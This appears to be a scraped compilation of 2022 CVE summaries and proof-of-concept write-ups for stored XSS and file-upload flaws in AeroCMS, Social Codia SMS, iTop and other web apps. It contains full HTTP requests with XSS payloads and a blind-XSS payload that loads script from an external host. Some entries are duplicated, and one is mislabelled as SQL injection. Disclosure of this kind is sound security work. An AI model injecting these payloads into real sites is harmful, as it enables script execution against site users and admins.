Musical World v1 was discovered to contain an arbitrary file upload vulnerability via uploaded_songs.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

CVE-2022-27064: GitHub - D4rkP0w4r/Musical-World-Unrestricted-File-Upload-RCE-POC

AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via view_all_comments.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Comments text field.

**AeroCMS-Comment-Stored\_XSS-POC**

*   `Note` => Don't need register or login account
*   `Description` => `Stored_XSS` at comment box

**Step to Reproduct**

*   Click `Read More` -> input payload `<img/src/onerror=prompt(10)>` at `Author` -> click `Submit` button

**Exploit****Vulnerable Code****POC**

*   `Injection Point`

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

*   `Request`

POST /AeroCMS/post.php?p\_id=36 HTTP/1.1
Host: localhost:8080
Content-Length: 126
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/AeroCMS/post.php?p\_id=36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441
Connection: close

comment\_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment\_email=bin%40gmail.com&comment\_content=hacked&create\_comment=

`POC VIDEO` https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing

CVE-2022-27063: GitHub - D4rkP0w4r/AeroCMS-Comment-Stored_XSS-Poc

Social Codia SMS v1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Title text field.

**sms-Add\_Student-Stored\_XSS-POC**

Description => Stored\_XSS at `Add Student`

**Step to Reproduct**

*   Login to admin -> `Students` -> `Add Student` -> input payload `<img/src/onerror=prompt(10)>` at `Enter Name`

**Exploit**

![image](https://user-images.githubusercontent.com/79050415/158715096-7fe6c540-b7cb-4293-b60f-f0e16b6d445c.png)

**Vulnerable Code**

![image](https://user-images.githubusercontent.com/79050415/158716291-52718f20-b719-44ef-a9ca-21b00e82b2de.png)

*   When inserting into the database, the input is not filtered out bad characters

**POC**

*   `Injection Point`

\------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>

*   `Request`

POST /sms/admin/addstudent.php HTTP/1.1
Host: localhost:8080
Content-Length: 992
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/sms/admin/addstudent.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k
Connection: close

------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="image"; filename="car.png"
Content-Type: application/octet-stream


------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="rollno"

1234567
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="name"

<img/src/onerror=prompt(10)>
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="contact"

123456
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="standerd"

1
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="city"

Newyork
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="email"

haha@gmail.com
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="gender"

male
------WebKitFormBoundaryAvKt9LM2RnnkuA0K
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryAvKt9LM2RnnkuA0K--

`POC VIDEO` https://drive.google.com/file/d/1PLRmIi7EBMAXkLMUhUy09PVph1CW6otF/view?usp=sharing

CVE-2022-27348: GitHub - D4rkP0w4r/sms-Add_Student-Stored_XSS-POC

Bootstrap v3.1.11 and v3.3.7 was discovered to contain a cross-site scripting (XSS) vulnerability via the Title parameter in /vendor/views/add_product.php.

CVE-2022-26624

AeroCMS v0.0.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability via add_post.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Post Title text field.

**AeroCMS-Add\_Posts-Stored\_XSS-Poc**

*   Description => Stored\_XSS at `Post Title`

**Step to Reproduct**

*   Login to admin panel -> `Posts` -> `Add Posts` -> `Post Title` -> inject payload `<img/src/onerror=prompt(10)>` -> The XSS will trigger when clicked `Edit Post` button

**Exploit**

![image](https://user-images.githubusercontent.com/79050415/156887124-fb539ece-2ad1-4ebd-9ce9-6fcfd688b36e.png) ![image](https://user-images.githubusercontent.com/79050415/156879926-c7009ae0-54b5-4b5c-a49f-6c693ce8f2e5.png)

**Vulnerable Code**

**POC**

*   `Injection Point`

\-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_title"

<img/src/onerror=prompt(10)>

*   `Request`

Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291
Content-Length: 1101
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit\_post&p\_id=26
Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2
Upgrade-Insecure-Requests: 1

-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_title"

<img/src/onerror=prompt(10)>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_category\_id"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_user"

admin
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_status"

published
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_tags"

1
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="post\_content"

<p>111</p>
-----------------------------85448121341942511952219062291
Content-Disposition: form-data; name="update\_post"

Edit Post
-----------------------------85448121341942511952219062291\--

`POC VIDEO` https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR\_/view?usp=sharing

CVE-2022-27062: GitHub - D4rkP0w4r/AeroCMS-Add_Posts-Stored_XSS-Poc

Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen.

**Unified endpoint  
management and security****Desktops | Laptops | Servers | Mobile devices |  
Browsers**

Manage and secure desktops, servers, laptops, mobile devices, and web browsers.

Learn more

CVE-2022-24681: ManageEngine - IT Operations and Service Management Software

A Cross Site Scripting (XSS) vulnerability exists in Exrick XMall Admin Panel as of 11/7/2021 via the GET parameter in product-add.jsp.

CVE-2021-43432: xmall/product-add.jsp at b146cceb21ca42d4237f31dbd7af5ced49048a56 · Exrick/xmall

When creating or updating credentials for single-user access, Apache NiFi wrote a copy of the Login Identity Providers configuration to the operating system temporary directory. On most platforms, the operating system temporary directory has global read permissions. NiFi immediately moved the temporary file to the final configuration directory, which significantly limited the window of opportunity for access. NiFi 1.16.0 includes updates to replace the Login Identity Providers configuration without writing a file to the operating system temporary directory.

CVE-2022-26850: Apache NiFi Security Reports

Combodi iTop is a web based IT Service Management tool. Prior to versions 2.7.6 and 3.0.0, cross-site scripting is possible for scripts outside of script tags when displaying HTML attachments. This issue is fixed in versions 2.7.6 and 3.0.0. There are currently no known workarounds.

Valid

Reported on

Jun 30th 2021

**💥 BUG**

stored xss via file upload

**💥 STEP TO REPRODUCE**

here in this case i uploaded a html file with xss payload inside.  
Plz check this 1 minute video to reproduce https://drive.google.com/file/d/1xKqYFgrsFUfp9Ufe4XiATQcAL-Q6Mr9G/view?usp=sharing

**💥 Impact**

I see there is many different type of role base user . So, user who has permission to upload document can make xss attack against higher level user or admin

![](https://avatars.githubusercontent.com/u/25035884?v=4)

![](https://avatars.githubusercontent.com/u/28839565?v=4)

Z-Old

commented 9 months ago

Admin

Hey ranjit-git, I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the combodo/itop team and are waiting to hear back 9 months ago

![](https://github.com/combodo.png)

A combodo/itop maintainer validated this vulnerability 5 months ago

The fix bounty is now up for grabs

![](https://github.com/combodo.png)

commented 3 months ago

Maintainer

The fix will be part of 2.7.6 that has just been released. A GitHub advisory was created : https://github.com/Combodo/iTop/security/advisories/GHSA-67x5-mqg4-rvgc

We will publish ths page and the advusory in 3 monthes.

![](https://avatars.githubusercontent.com/u/8947448?v=4)

The fix bounty has been dropped

![](https://avatars.githubusercontent.com/u/8947448?v=4)

Hi, Combodo usually send goodies for its contributors, as a way to thank them. @ranjit-git can you send your postal address to pierre.goiffon @ combodo.com (remove spaces around the @)?

![](https://avatars.githubusercontent.com/u/25035884?v=4)

@mainatiner Thanks for such care. Happy to secure itop project. I will send postal address to above mail id

to join this conversation

![](https://avatars.githubusercontent.com/u/25035884?v=4)

![](https://avatars.githubusercontent.com/u/28839565?v=4)

Z-Old

commented 9 months ago

Admin

Hey ranjit-git, I've just emailed the maintainer and am waiting to hear back. Good job!

We have contacted a member of the combodo/itop team and are waiting to hear back 9 months ago

![](https://github.com/combodo.png)

A combodo/itop maintainer validated this vulnerability 5 months ago

The fix bounty is now up for grabs

![](https://github.com/combodo.png)

commented 3 months ago

Maintainer

The fix will be part of 2.7.6 that has just been released. A GitHub advisory was created : https://github.com/Combodo/iTop/security/advisories/GHSA-67x5-mqg4-rvgc

We will publish ths page and the advusory in 3 monthes.

![](https://avatars.githubusercontent.com/u/8947448?v=4)

The fix bounty has been dropped

![](https://avatars.githubusercontent.com/u/8947448?v=4)

Hi, Combodo usually send goodies for its contributors, as a way to thank them. @ranjit-git can you send your postal address to pierre.goiffon @ combodo.com (remove spaces around the @)?

![](https://avatars.githubusercontent.com/u/25035884?v=4)

@mainatiner Thanks for such care. Happy to secure itop project. I will send postal address to above mail id

to join this conversation

CVE-2022-24811: Cross-site Scripting (XSS) - Stored in itop

Simple Student Information System v1.0 was discovered to contain a SQL injection vulnerability via add/Student.

\# Exploit Title: Student Information System - Blind XSS

\# Exploit Author: NS Kumar (n1\_x)

\# Vendor Name: oretnom23

\# Vendor Homepage: https://www.sourcecodester.com/php/15147/simple-student-information-system-phpoop-free-source-code.html

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sis\_0\_1.zip

\# Version: v1.0

\# Tested on: Parrot GNU/Linux 4.10, Apache

\# CVE: ytd

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`Description:\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

\-

A Blind XSS issue in Student Information System v.1.0 allows to inject Arbitrary JavaScript via add /Student.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`Payload used:\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

"><script src=https://d4.xss.ht></script>

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`Steps to reproduce:\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

1- Go to http://victim.com

2- In "staff portal" option, paste the payload in student first name.

3- Then goto your xss hunter, You will see xss fires alert.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

Tag

#xss